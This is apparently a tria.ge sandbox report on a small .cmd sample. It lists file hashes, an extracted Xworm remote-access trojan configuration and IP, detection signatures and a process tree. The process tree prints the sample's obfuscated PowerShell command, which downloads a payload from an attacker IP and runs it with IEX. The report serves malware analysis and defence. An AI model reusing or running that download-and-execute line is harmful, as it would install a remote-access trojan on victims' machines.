Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
142s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
28/02/2025, 07:11
Static task
static1
Behavioral task
behavioral1
Sample
185.7.214_1.211.cmd
Resource
win7-20240903-en
General
-
Target
185.7.214_1.211.cmd
-
Size
172B
-
MD5
e3f9c42a3eee3a73f89685a8c2cc027e
-
SHA1
9d934754caf36aeb28f239f0011bedc4f68138f5
-
SHA256
2ce52ae9ba8114731368521d8dfdc951e901d13316ebaca8231ab398ae69c85a
-
SHA512
51d8caf7b1dad18417c236660e7c87b7bbf5a96b0bd78166eb3897b995938708767d1ad0e32250dc246d88f40838e228154d7028ecf708e4b54fea7f0fde57a9
Malware Config
Extracted
http://185.7.214.211/a.mp4
Extracted
xworm
5.0
185.7.214.211:4444
Signatures
-
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral2/files/0x000300000001e0fe-25.dat family_xworm behavioral2/memory/5116-26-0x0000016B59670000-0x0000016B59680000-memory.dmp family_xworm behavioral2/memory/2908-28-0x0000000000400000-0x000000000040E000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 5116 powershell.exe -
pid Process 5116 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 5116 set thread context of 2908 5116 powershell.exe 92 -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 5116 powershell.exe 5116 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 5116 powershell.exe Token: SeDebugPrivilege 2908 MSBuild.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 4996 wrote to memory of 5116 4996 cmd.exe 86 PID 4996 wrote to memory of 5116 4996 cmd.exe 86 PID 5116 wrote to memory of 4104 5116 powershell.exe 90 PID 5116 wrote to memory of 4104 5116 powershell.exe 90 PID 4104 wrote to memory of 3296 4104 csc.exe 91 PID 4104 wrote to memory of 3296 4104 csc.exe 91 PID 5116 wrote to memory of 2908 5116 powershell.exe 92 PID 5116 wrote to memory of 2908 5116 powershell.exe 92 PID 5116 wrote to memory of 2908 5116 powershell.exe 92 PID 5116 wrote to memory of 2908 5116 powershell.exe 92 PID 5116 wrote to memory of 2908 5116 powershell.exe 92 PID 5116 wrote to memory of 2908 5116 powershell.exe 92 PID 5116 wrote to memory of 2908 5116 powershell.exe 92 PID 5116 wrote to memory of 2908 5116 powershell.exe 92
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\185.7.214_1.211.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:4996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$A1='ject Net.WebCli';$B2='loadString(''http://185.7.214.211/a.mp4'')';$C3='ent).Down';$D4='(New-Ob';$E5=IEX ($D4,$A1,$C3,$B2 -Join '')|IEX"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dha3b2ei\dha3b2ei.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7985.tmp" "c:\Users\Admin\AppData\Local\Temp\dha3b2ei\CSCE1BE0E28F29143E58B3DFAC3C0861E82.TMP"4⤵PID:3296
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD50468e06767ce903a637918645930423f
SHA17428b6388bd8d6ddbd461576996a8caad56f65c6
SHA25625ec1b3e1474e8f4dfd7ecebee660830bb161f399ad94b125a8449ec02e6bc4f
SHA51245a535e2cef504d483180c74fab2b3d1a2a96156aa89c848f6141cd5beddb85b2b9af13c91007db1964b54bb820dc4f8d13a7f127267ca71848ef58405c46dc8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
41KB
MD524fc7ad127458e15e52292cf03cc94d6
SHA125cff545e88d395043901e3717cd86cc636dbb90
SHA256b83bf9426da3d8be783d48a92606d3894ba5a2c3e28a3a59b6ba762657294fb9
SHA5122620464495ea06a1cbb18689660a39406e34f6aad013123c764d69476361fe71a57e1ed7800568b8ef8f293d752bd27357ff72bcc363aa4fffc4d9b3101377d7
-
Filesize
652B
MD5395436c325fbdc18b9b3ee672271ddf9
SHA1697f1a75d8d57fcda9abdf5ff83db13bc24a6f92
SHA256ac0508df16a481c6c6b223fb9a7dd396e26ddc77cba0b082bb62a80da385d7da
SHA51296ef52d8078b7ed28811785794e7e76a142e78ced8c19dd95dfe460f04c00fcc7bdbf1598dca3b9e1eef6c249d5bf763aceb13c2b7ed3622c96ef664f3625691
-
Filesize
101KB
MD5cba2847534e58636a5292dc393b45fdd
SHA1ffd2fc63507cfee641ba53038d3f017a6ededbee
SHA25633561d11060d90e7a1d49d19e395fd943c2500af98521412d2390b43b6cec6bd
SHA5121b9bd2957ffe364788abcca1d90f2deb4634c89eea0a07e6a203573ed606df95b3e28ce41de038badaef674b2a8606fb8370abb3d9697b45f80f82d5e89ec1d2
-
Filesize
204B
MD55173d3aedc878e8538351a90f4da5569
SHA1b75fcb53c2c11238b3f4af54e69ec8e33ce1c574
SHA25692bf618864046e4bc7e604ef1afac0aac5debbdf95100490a759d76fe5b14f83
SHA51243ec2bed3964afa03f63c7a319c1b23098cebd269f28a7eac2a536b801365db552995dbf3716c633b04882812638435a0efa1cafdfadf9f7375e1435dadc9bb6